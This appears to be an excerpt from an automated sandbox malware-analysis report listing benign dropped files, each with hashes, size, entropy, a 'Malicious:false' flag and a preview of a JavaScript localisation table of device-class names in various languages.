      SHA-256:2FCDDBB562DF630EB70BE0B4F8F33545D44060D24809EA0BBECD177ECA69E442
      SHA-512:CF5EE236FC8C73CE91F79659189D4879ACD95931D928A5DE2FA632230D13652B2E954E9F51D34EB7EFA90149911A0CBF7A163D1D57341FE1258D71EB4203D5AD
      Malicious:false
      Reputation:low
      Preview:window.languages["es"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "dispositivo Bluetooth",. "deviceclasses_bluetooth-single-for": "dispositivo Bluetooth",. "deviceclasses_bluetooth-plural-main": "dispositivos Bluetooth",. "deviceclasses_bluetooth-plural-for": "dispositivos Bluetooth",. "deviceclasses_cardreader-single-main": "lector de.tarjetas",. "deviceclasses_cardreader-single-for": "lector de.tarjetas",. "deviceclasses_cardreader-plural-main": "lectores de.tarjetas",. "deviceclasses_cardreader-plural-for": "lectores de.tarjetas",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "dispositivo de.entrada",. "deviceclasses_inputdev-single-for": "dispositivo de.entrada",. "deviceclasses_inputdev-plural-main": "dispositivos de.entr
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):86316
      Entropy (8bit):4.8593948248985805
      Encrypted:false
      SSDEEP:
      MD5:2074B7485ECBF3D17C4717FDF72ACB5F
      SHA1:3250096C31904C5E1247CA231A5C8E2F79213B35
      SHA-256:34D069E9D65186FAB23EA5E67C4AD862CA24C8C87C7FDCAE9D8771D3DFF48971
      SHA-512:5A431B7D3F822CAA8FF352E9CD7DE0EF83527C339D37807836D072E8DD9082FDF1722B27455BFE0B247D7D1193D42236AD014A0DA619C0A46EF3B4EB1D03F56F
      Malicious:false
      Reputation:low
      Preview:window.languages["et"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetoothi adapter",. "deviceclasses_bluetooth-single-for": "Bluetoothi adapterile",. "deviceclasses_bluetooth-plural-main": "Bluetoothi adapterid",. "deviceclasses_bluetooth-plural-for": "Bluetoothi adapteritele",. "deviceclasses_cardreader-single-main": "kaardilugeja",. "deviceclasses_cardreader-single-for": "kaardilugeja",. "deviceclasses_cardreader-plural-main": "kaardilugejad",. "deviceclasses_cardreader-plural-for": "kaardilugejad",. "deviceclasses_chipset-single-main": "kiibistik",. "deviceclasses_chipset-single-for": "kiibistikule",. "deviceclasses_chipset-plural-main": "kiibistikud",. "deviceclasses_chipset-plural-for": "kiibistikudele",. "deviceclasses_inputdev-single-main": "sisestus seade",. "deviceclasses_inputdev-single-for": "sisestus seadmele",. "deviceclasses_inputdev-plural-main": "sisestus seadmed",. "deviceclasses_inputdev-plural-fo
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):104268
      Entropy (8bit):5.364743036350233
      Encrypted:false
      SSDEEP:
      MD5:42851DEEA045D3AC3FC105DD1C33765D
      SHA1:B687D9E3A7614EED4BCDA6970C5600705B91B070
      SHA-256:3F1239F7D0177F8CD48EAD4FA94EE1AE404B7E2CDDA41BBCF8D065C1752134CB
      SHA-512:B3C6A69704A97D758569476B1F836CD01160043A693C555844205445D34E4084D40D836BAC3E9C5C12F7DDF99BDC6039E6B7D01AB6BB50AC8C084BF4D7E637F1
      Malicious:false
      Reputation:low
      Preview:window.languages["fa"] = {. plural: function (n) { return Number((n > 1)) },. "deviceclasses_bluetooth-single-main": "...... ......",. "deviceclasses_bluetooth-single-for": "...... ......",. "deviceclasses_bluetooth-plural-main": "........ ......",. "deviceclasses_bluetooth-plural-for": "........ ......",. "deviceclasses_cardreader-single-main": ".... ....",. "deviceclasses_cardreader-single-for": ".... ....",. "deviceclasses_cardreader-plural-main": ".... .... ..",. "deviceclasses_cardreader-plural-for": ".... .... ..",. "deviceclasses_chipset-single-main": "........",. "deviceclasses_chipset-single-for": "........",. "deviceclasses_chipset-plural-main": "........ ..",. "deviceclasses_chipset-plural-for": "........ ..",. "deviceclasses_inputdev-single-main": "...... .....",. "deviceclasses_inputdev-single-for": "...... .....",
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (587)
      Category:dropped
      Size (bytes):93043
      Entropy (8bit):4.819075158962328
      Encrypted:false
      SSDEEP:
      MD5:E91CF03296EC51E663DF31854D93B49A
      SHA1:14683B3751DCDFE12A2CA02779941F814F298319
      SHA-256:5E0D97ACE20EE32B3759278476B34B0CCD2451FAB51A5CCEF8EF42AFC45C3613
      SHA-512:E8CD4636322D49E6A046345F9FA34A9344F4C2BEFAFAABF907AAC58255645875A78988A066E4E7EB47C6074E684453AF459126E11D681C43B87DDC4C9D20B3EC
      Malicious:false
      Reputation:low
      Preview:window.languages["fil"] = {. plural: function (n) { return Number((n == 1 || n==2 || n==3) || (n % 10 != 4 || n % 10 != 6 || n % 10 != 9)) },. "deviceclasses_bluetooth-single-main": "Bluetooth device",. "deviceclasses_bluetooth-single-for": "Bluetooth device",. "deviceclasses_bluetooth-plural-main": "Bluetooth devices",. "deviceclasses_bluetooth-plural-for": "Bluetooth devices",. "deviceclasses_cardreader-single-main": "card reader",. "deviceclasses_cardreader-single-for": "card reader",. "deviceclasses_cardreader-plural-main": "card readers",. "deviceclasses_cardreader-plural-for": "card readers",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "input device",. "deviceclasses_inputdev-single-for": "input device",. "deviceclasses_inputdev-plural-main": "input devices",. "deviceclasses_
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):94790
      Entropy (8bit):4.877948514569426
      Encrypted:false
      SSDEEP:
      MD5:F0D62A626904573E852D794279D4898A
      SHA1:CD0F9A1FE60E54CF6BF1727A62F62C5D57C64436
      SHA-256:3FD509332DF8DB1FD7C1564675A99E4FDF70CF7076AA804B1DCF9D99B2F1EB0A
      SHA-512:70E91299CAE93017F900DEA20E230AA144723839ED47DD9E8B7243F83E6A272F47D760F8BD347D940E3385B6B9A34D551C435C025C9B3494031759B74978C966
      Malicious:false
      Reputation:low
      Preview:window.languages["fr"] = {. plural: function (n) { return Number((n > 1)) },. "deviceclasses_bluetooth-single-main": "P.riph.rique Bluetooth",. "deviceclasses_bluetooth-single-for": "P.riph.rique Bluetooth",. "deviceclasses_bluetooth-plural-main": "P.riph.riques Bluetooth",. "deviceclasses_bluetooth-plural-for": "P.riph.riques Bluetooth",. "deviceclasses_cardreader-single-main": "lecteur de.carte",. "deviceclasses_cardreader-single-for": "lecteur de.carte",. "deviceclasses_cardreader-plural-main": "lecteurs de.carte",. "deviceclasses_cardreader-plural-for": "lecteurs de.carte",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "p.riph.rique d.entr.e",. "deviceclasses_inputdev-single-for": "p.riph.rique d.entr.e",. "deviceclasses_inputdev-plural-main": "p.riph.rique
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):121871
      Entropy (8bit):5.160897957247398
      Encrypted:false
      SSDEEP:
      MD5:8BE748CAE40E0C1BF4FE43D50CE3568C
      SHA1:52EC74BA654D687466515AD533585A71C65D6DD2
      SHA-256:9FADC0EDA5810431097D2EECAEDDA3F2ACA39BE5DF9BE9AF592E95B87FFE6FE0
      SHA-512:DBFE9020D8BB722295441862D7B549F17F2BBA734275C4C659A872B3304138A4588BAF89191DF62F0371540A581CD5537BDC6F0CE29DBA7669611D0686FB5A75
      Malicious:false
      Reputation:low
      Preview:window.languages["gu"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth .....",. "deviceclasses_bluetooth-single-for": "Bluetooth .....",. "deviceclasses_bluetooth-plural-main": "Bluetooth ......",. "deviceclasses_bluetooth-plural-for": "Bluetooth ......",. "deviceclasses_cardreader-single-main": "..... ....",. "deviceclasses_cardreader-single-for": "..... ....",. "deviceclasses_cardreader-plural-main": "..... ......",. "deviceclasses_cardreader-plural-for": "..... ......",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": "........",. "deviceclasses_chipset-plural-for": "........",. "deviceclasses_inputdev-single-main": "..... ......",
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):98581
      Entropy (8bit):5.144016259977154
      Encrypted:false
      SSDEEP:
      MD5:56E700EB99C875A16CE05F8BA8417CFF
      SHA1:CCD6075932F073156BAFE186A421B9C8CA91AD99
      SHA-256:E65F8A16A9C514601C32F594EB7E4C9914B82A6B9DE672DF76B6E389D7BD85A9
      SHA-512:FA51FB7D04329DDE78A81A96182A419BCED3021D836B63C8B8D5A4E7DEAB565A5D472AE3488B129C1D0386A4AAB34804DA92B80F945A4E12AE536DB7F7B454F9
      Malicious:false
      Reputation:low
      Preview:window.languages["he"] = {. plural: function (n) { return Number((n == 1 && n % 1 == 0) ? 0 : (n == 2 && n % 1 == 0) ? 1: (n % 10 == 0 && n % 1 == 0 && n > 10) ? 2 : 3) },. "deviceclasses_bluetooth-single-main": ".... Bluetooth",. "deviceclasses_bluetooth-single-for": ".... Bluetooth",. "deviceclasses_bluetooth-plural-main": "..... Bluetooth",. "deviceclasses_bluetooth-plural-for": "..... Bluetooth",. "deviceclasses_cardreader-single-main": ".... .......",. "deviceclasses_cardreader-single-for": ".... .......",. "deviceclasses_cardreader-plural-main": ".... .......",. "deviceclasses_cardreader-plural-for": ".... .......",. "deviceclasses_chipset-single-main": ".... .....",. "deviceclasses_chipset-single-for": ".... .....",. "deviceclasses_chipset-plural-main": "..... .....",. "deviceclasses_chipset-plural-for": "..... .....",. "deviceclasses_inputdev-single-main": "....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):133586
      Entropy (8bit):5.034490614130706
      Encrypted:false
      SSDEEP:
      MD5:5BC9E0047895C548731E135339002637
      SHA1:73AF23BE447F20160D9C519471347249FAA85684
      SHA-256:C91CC3B5C70858A37EB5D550DA01EC1CF479A3755538FF1EC940C89A56C7DC62
      SHA-512:EC84271E901B945295B24A74AA8C6CC2E4040FABB4D0F316BDAC9A9ECA1D07F4434910B064283C022274D9D5B2BED54D65E8F0D611A5116A019720EE165FD530
      Malicious:false
      Reputation:low
      Preview:window.languages["hi"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ......",. "deviceclasses_bluetooth-single-for": "Bluetooth ......",. "deviceclasses_bluetooth-plural-main": ".. Bluetooth .....",. "deviceclasses_bluetooth-plural-for": ".. Bluetooth .....",. "deviceclasses_cardreader-single-main": "..... ....",. "deviceclasses_cardreader-single-for": "..... ....",. "deviceclasses_cardreader-plural-main": ".. ..... ....",. "deviceclasses_cardreader-plural-for": ".. ..... ....",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": ".. ......",. "deviceclasses_chipset-plural-for": ".. ......",. "deviceclasses_inputdev-single-main": "..... .
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):92230
      Entropy (8bit):5.069150242644614
      Encrypted:false
      SSDEEP:
      MD5:29000DDC523C46D419ACB8E6E2EBE14A
      SHA1:B18DBF7F6790B02466615C68BF8A15BDC559DC8A
      SHA-256:2EA10E048E30C3C30051F6CEB658E1E006F693831C8B85FAB1BE5B98A381D170
      SHA-512:56FC04B9F8B42AAD79DF916D9C7C2380407D0FFB8196CBA1EC5651D9D6341454090A39A760760F24F67826F10D699367277C2043503432C03E3957F4F89FF243
      Malicious:false
      Reputation:low
      Preview:window.languages["hu"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "bluetooth eszk.z",. "deviceclasses_bluetooth-single-for": "bluetooth eszk.z",. "deviceclasses_bluetooth-plural-main": "bluetooth eszk.z",. "deviceclasses_bluetooth-plural-for": "bluetooth eszk.z",. "deviceclasses_cardreader-single-main": "k.rtyaolvas.",. "deviceclasses_cardreader-single-for": "k.rtyaolvas.",. "deviceclasses_cardreader-plural-main": "k.rtyaolvas.",. "deviceclasses_cardreader-plural-for": "k.rtyaolvas.",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipset",. "deviceclasses_chipset-plural-for": "chipset",. "deviceclasses_inputdev-single-main": "bemeneti eszk.z",. "deviceclasses_inputdev-single-for": "bemeneti eszk.z",. "deviceclasses_inputdev-plural-main": "bemeneti eszk.z",. "deviceclasses_inputdev-plural-for": "bemeneti eszk.z",.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (542)
      Category:dropped
      Size (bytes):128884
      Entropy (8bit):5.4157148515042906
      Encrypted:false
      SSDEEP:
      MD5:4559E20597687FF81F6293C4D4285BA1
      SHA1:9A8EA3E36EF13F0B263C225997F4FD7C899612F8
      SHA-256:8C3BAC6D6FE01DFDC28EEF45EA605527B4279DC661F5195CE0B146021D42F6C6
      SHA-512:5ED991A91F50E9758FEC2E5FF0F05D1BF3CE8955E9F16AE970C50139CCEC61818B7723824A52225E2EF627AC458258B11CC459E9F1D4631A0E27280243EC05D9
      Malicious:false
      Reputation:low
      Preview:window.languages["hy"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ....",. "deviceclasses_bluetooth-single-for": "Bluetooth .....",. "deviceclasses_bluetooth-plural-main": "Bluetooth .......",. "deviceclasses_bluetooth-plural-for": "Bluetooth .......",. "deviceclasses_cardreader-single-main": "..... ........",. "deviceclasses_cardreader-single-for": "....... .........",. "deviceclasses_cardreader-plural-main": "..... ............",. "deviceclasses_cardreader-plural-for": "..... ............",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": "..........",. "deviceclasses_chipset-plural-for": "..........",. "deviceclasses_inputdev-single-main": "........ ....",. "deviceclasses_inputdev-single-for": "
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):89696
      Entropy (8bit):4.789276152338561
      Encrypted:false
      SSDEEP:
      MD5:7AF4F0296D4B9F13A61BF0E408AF709B
      SHA1:9BD3A50658F6863CFF14791763C410C04CE6E3ED
      SHA-256:D7E2681822128D3287AE2F143B1D5E6FE1F48FA76D6950A201E33455084A2AFF
      SHA-512:EBA7B019C09C8CEB3EC8BF1290B6DE99E6043BFC73C3D03AD8B584D2E1CDB90329048A0E0E8E4206A4014D196F1F1A1F5FB42D6F59AE79B1537CB600F2E3AE0E
      Malicious:false
      Reputation:low
      Preview:window.languages["id"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "perangkat Bluetooth",. "deviceclasses_bluetooth-single-for": "perangkat Bluetooth",. "deviceclasses_bluetooth-plural-main": "perangkat Bluetooth",. "deviceclasses_bluetooth-plural-for": "perangkat Bluetooth",. "deviceclasses_cardreader-single-main": "pembaca kartu",. "deviceclasses_cardreader-single-for": "pembaca kartu",. "deviceclasses_cardreader-plural-main": "pembaca kartu-kartu",. "deviceclasses_cardreader-plural-for": "pembaca kartu-kartu",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipset-chipset",. "deviceclasses_chipset-plural-for": "chipset-chipset",. "deviceclasses_inputdev-single-main": "perangkat masukan",. "deviceclasses_inputdev-single-for": "perangkat masukan",. "deviceclasses_inputdev-plural-main": "perangkat-perangkat masukan",. "deviceclasses_input
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):92405
      Entropy (8bit):4.815340861450334
      Encrypted:false
      SSDEEP:
      MD5:8BD2B4227C80D65B6F6359D272DF2060
      SHA1:226B11DA5A3EC97EE1C21FB7E604355FF5C160F6
      SHA-256:1188CD684BD0A47DFE0B34244FE4CA426964F529CE7F31A568CE5A9479D121A4
      SHA-512:E01721DB3AD828AF874B14244FA3AB17ECCBD216EC14D73ACF6154360A116772F6B0691167F883920D5843E8EF0AECAA67E17BA7AC20E0E3D07C68CDA1172D52
      Malicious:false
      Reputation:low
      Preview:window.languages["it"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "dispositivo bluetooth",. "deviceclasses_bluetooth-single-for": "dispositivo Bluetooth",. "deviceclasses_bluetooth-plural-main": "dispositivi bluetooth",. "deviceclasses_bluetooth-plural-for": "dispositivi bluetooth",. "deviceclasses_cardreader-single-main": "card reader",. "deviceclasses_cardreader-single-for": "card reader",. "deviceclasses_cardreader-plural-main": "card reader",. "deviceclasses_cardreader-plural-for": "card reader",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipset",. "deviceclasses_chipset-plural-for": "chipset",. "deviceclasses_inputdev-single-main": "dispositivo input",. "deviceclasses_inputdev-single-for": "dispositivo input",. "deviceclasses_inputdev-plural-main": "dispositivi input",. "deviceclasses_inputdev-plural-for": "dispositivi i
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (542)
      Category:dropped
      Size (bytes):129610
      Entropy (8bit):5.142310098541957
      Encrypted:false
      SSDEEP:
      MD5:1E7281C75BA180B4769025279B2B39D3
      SHA1:E3400BB521A5E3945F746F682C9533225A071C6A
      SHA-256:728CBEE8DC4D1A86DADBAB9EC3344882F37AFD108C731A8E01159D84A431B820
      SHA-512:3F6720BFFBC0251F6E93EEF95DFA3F373EDAF8EF54D914AA876DFFB90A41ECB090B61488A27471E2EBC5331B546EB0401FE159BF4F4DFFD2AB89789D022FC822
      Malicious:false
      Reputation:low
      Preview:window.languages["ka"] = {. plural: function (n) { return Number((n!=1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ...........",. "deviceclasses_bluetooth-single-for": "Bluetooth ...........",. "deviceclasses_bluetooth-plural-main": "Bluetooth ...........",. "deviceclasses_bluetooth-plural-for": "Bluetooth ...........",. "deviceclasses_cardreader-single-main": "....... ...........",. "deviceclasses_cardreader-single-for": "....... ...........",. "deviceclasses_cardreader-plural-main": "....... ...........",. "deviceclasses_cardreader-plural-for": "....... ...........",. "deviceclasses_chipset-single-main": ".......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": "..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91216
      Entropy (8bit):5.64870531694949
      Encrypted:false
      SSDEEP:
      MD5:74E65E1C6348859A36E9A6DD73B07678
      SHA1:4E7E8DAAEB0CC40A1FE2C85B11430C068CB4F9DC
      SHA-256:7A638D34BD26946A0A3E6E3D983D36C6DF283A350E12DF563EE429A0685C45E9
      SHA-512:A651C3F723FE53BD7E7C7EAC1E65E2FA230FF5D4AE56B37B5999063277F920B7ECDDC3C207840D19EB0ACCA18D8980740DA126F23BD6E1ED07CF97826A011C69
      Malicious:false
      Reputation:low
      Preview:window.languages["ko"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": ".... ..",. "deviceclasses_bluetooth-single-for": ".... ..",. "deviceclasses_bluetooth-plural-main": ".... ..",. "deviceclasses_bluetooth-plural-for": ".... ..",. "deviceclasses_cardreader-single-main": ".. ..",. "deviceclasses_cardreader-single-for": ".. ..",. "deviceclasses_cardreader-plural-main": ".. ..",. "deviceclasses_cardreader-plural-for": ".. ..",. "deviceclasses_chipset-single-main": "..",. "deviceclasses_chipset-single-for": "..",. "deviceclasses_chipset-plural-main": "..",. "deviceclasses_chipset-plural-for": "..",. "deviceclasses_inputdev-single-main": ".. ..",. "deviceclasses_inputdev-single-for": ".. ..",. "deviceclasses_inputdev-plural-main": ".. ..",. "deviceclasses_inputdev-plural-for": ".. ..",. "deviceclasses_lan
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):115180
      Entropy (8bit):5.4459787022280315
      Encrypted:false
      SSDEEP:
      MD5:DC680CC442C6354BEBAF6C8D2F8BD502
      SHA1:AD869565FF1DCBB7F02264929DDB75D213BA5841
      SHA-256:D746C1E29348D5BB168AD04F7E8BBCAB4F3F5995282191F22DD3E7BA1535B9FA
      SHA-512:A488672648616B471E1813C2748B7F7CA2D982A3B986208805C1B2B298525BEE31FEF0A16164082D4DC300BB46DE3DD5E1CBA6108BC4DBC669F611518AAE4B25
      Malicious:false
      Reputation:low
      Preview:window.languages["ku"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "...... Bluetooth",. "deviceclasses_bluetooth-single-for": "...... Bluetooth",. "deviceclasses_bluetooth-plural-main": "........... Bluetooth",. "deviceclasses_bluetooth-plural-for": "........... Bluetooth",. "deviceclasses_cardreader-single-main": "............. .... ......",. "deviceclasses_cardreader-single-for": "............. .... ......",. "deviceclasses_cardreader-plural-main": "................ ...... ....",. "deviceclasses_cardreader-plural-for": "................ ...... ....",. "deviceclasses_chipset-single-main": "........ ..........",. "deviceclasses_chipset-single-for": "........ ..........",. "deviceclasses_chipset-plural-main": "........ .....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90536
      Entropy (8bit):4.82952519906427
      Encrypted:false
      SSDEEP:
      MD5:54F1D6637716099488E924EF2B1465BF
      SHA1:06E238441409F36E3B958300CF960272F472B6DB
      SHA-256:11BB44F906AAC5B02EDF6251898CF73B9F23A5D9E6720DD1CBB94D5B07D9E141
      SHA-512:4624B170020F0946719B7B5EA3C5F5111F162477BD94DDC87A05AD2064B1A878F0B43481D107E6767E4A1B804216E6F449E87D874312C7B080ECA84DE27761BF
      Malicious:false
      Reputation:low
      Preview:window.languages["nl"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth apparaat",. "deviceclasses_bluetooth-single-for": "Bluetooth apparaat",. "deviceclasses_bluetooth-plural-main": "Bluetooth apparaten",. "deviceclasses_bluetooth-plural-for": "Bluetooth apparaten",. "deviceclasses_cardreader-single-main": "kaartlezer",. "deviceclasses_cardreader-single-for": "kaartlezer",. "deviceclasses_cardreader-plural-main": "kaartlezers",. "deviceclasses_cardreader-plural-for": "kaartlezers",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "invoerapparaat",. "deviceclasses_inputdev-single-for": "invoerapparaat",. "deviceclasses_inputdev-plural-main": "invoerapparaten",. "deviceclasses_inputdev-plural-for": "invoerapparaten",. "deviceclas
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):88568
      Entropy (8bit):4.856208587921374
      Encrypted:false
      SSDEEP:
      MD5:0D242BE4EA5BB62B27ADC5C0E9AD7500
      SHA1:450E8AED8E5E3CAA6344753137C344A979B39205
      SHA-256:91FD4D4F3B8103F5E4888F23D8BA096EE7F87C1DE44AD08466E426168084AD78
      SHA-512:3A976AC4ECDF01B019F6F96FF810F48B2A85E500083BF39C137EBAEB20E7FE5236253AE57011153DAD980A8C4649401C7D15CAE78581673506E8242AEAA29020
      Malicious:false
      Reputation:low
      Preview:window.languages["no"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth enhet",. "deviceclasses_bluetooth-single-for": "Bluetooth enhet",. "deviceclasses_bluetooth-plural-main": "Bluetooth enheter",. "deviceclasses_bluetooth-plural-for": "Bluetooth enheter",. "deviceclasses_cardreader-single-main": "kortleser",. "deviceclasses_cardreader-single-for": "kortleser",. "deviceclasses_cardreader-plural-main": "kortlesere",. "deviceclasses_cardreader-plural-for": "kortlesere",. "deviceclasses_chipset-single-main": "brikkesett",. "deviceclasses_chipset-single-for": "brikkesett",. "deviceclasses_chipset-plural-main": "brikkesett",. "deviceclasses_chipset-plural-for": "brikkesett",. "deviceclasses_inputdev-single-main": "inndata enhet",. "deviceclasses_inputdev-single-for": "inndata enhet",. "deviceclasses_inputdev-plural-main": "inndata enheter",. "deviceclasses_inputdev-plural-for": "inndata enheter",. "deviceclasses_la
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):88587
      Entropy (8bit):4.851906364616828
      Encrypted:false
      SSDEEP:
      MD5:0C6E4A769F3613644E57EBB283F6F13E
      SHA1:87606556F87110980BD4D6E31DBFAA0BAFE9A7A8
      SHA-256:DE4FDE505250732C2F841AE596832FD0F52D86E95A6222CB8AB7EF226520C8E2
      SHA-512:4A095D69383034D57281D01DECFEBFF3B87F35D99548E2DF7ADEF8AC04504253EE2FF6A52BBB99A6D5ABE49B665AEE3FECEB63D0FDFF0A42EE094F90B5BDDBB1
      Malicious:false
      Reputation:low
      Preview:window.languages["om"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Meeshaa Bluetooth",. "deviceclasses_bluetooth-single-for": "Meeshaa Bluetooth",. "deviceclasses_bluetooth-plural-main": "Meeshawwaan Bluetooth",. "deviceclasses_bluetooth-plural-for": "Meeshawwaan Bluetooth",. "deviceclasses_cardreader-single-main": "Dubbistuu Kaardii",. "deviceclasses_cardreader-single-for": "Dubbistuu Kaardii",. "deviceclasses_cardreader-plural-main": "Dubbistuu Kaardiwwanni",. "deviceclasses_cardreader-plural-for": "Dubbistuu Kaardiwwanni",. "deviceclasses_chipset-single-main": "Chipsetti",. "deviceclasses_chipset-single-for": "Chipsetti",. "deviceclasses_chipset-plural-main": "Chipsettiwwaan",. "deviceclasses_chipset-plural-for": "Chipsettiwwaan",. "deviceclasses_inputdev-single-main": "Meeshaa Keessa galchittuu",. "deviceclasses_inputdev-single-for": "Meeshaa keessa galchittuu",. "deviceclasses_inputdev-plural-main": "Meeshawwaan k
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90696
      Entropy (8bit):4.973784405115299
      Encrypted:false
      SSDEEP:
      MD5:452BBFECCF7C37D80128C1E8D8931580
      SHA1:4250D002CD3B1CDC2B7C333B4A40B844A9E291C8
      SHA-256:B0F22208908AF5DB599ABBF824C8681612C740AE464C21CB2C3CB201E92F80A0
      SHA-512:93BE5CCFAAFF1340A1A94FC6AA40BD5E8D551C917CAAB5D60646EE736674C0FC1A19B23264B02FEA2F487FE5CFA6D4FCF6612CBC11B2529EF77DCD15A1198E8F
      Malicious:false
      Reputation:low
      Preview:window.languages["pl"] = {. plural: function (n) { return Number((n==1 ? 0 : (n%10>=2 && n%10<=4) && (n%100<12 || n%100>14) ? 1 : n!=1 && (n%10>=0 && n%10<=1) || (n%10>=5 && n%10<=9) || (n%100>=12 && n%100<=14) ? 2 : 3)) },. "deviceclasses_bluetooth-single-main": "urz.dzenie Bluetooth",. "deviceclasses_bluetooth-single-for": "urz.dzenie Bluetooth",. "deviceclasses_bluetooth-plural-main": "urz.dzenia Bluetooth",. "deviceclasses_bluetooth-plural-for": "urz.dzenia Bluetooth",. "deviceclasses_cardreader-single-main": "czytnik kart",. "deviceclasses_cardreader-single-for": "czytnik kart",. "deviceclasses_cardreader-plural-main": "czytniki kart",. "deviceclasses_cardreader-plural-for": "czytniki kart",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsety",. "deviceclasses_chipset-plural-for": "chipsety",. "deviceclasses_inputdev-single-main": "urz.dzenie wej.ciowe",. "deviceclasse
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):101279
      Entropy (8bit):5.450821638385434
      Encrypted:false
      SSDEEP:
      MD5:C9E77802174CDE387373BEC44CD9AE0E
      SHA1:77C515D9C23D990ABCCE398837ADAA4777CE67BA
      SHA-256:82559990522F1F2F6712FB467EEEF9A3E4CD3DFC23F9428108CED6E4E25AF403
      SHA-512:D240548E414F42B899EF687D5BCBE6CAC21FDCC088C38507D07492CB88D6F440C98FD3248538CC95B20C37A00CF06D3EE92A890C920FE6BCA52A0515D089DD57
      Malicious:false
      Reputation:low
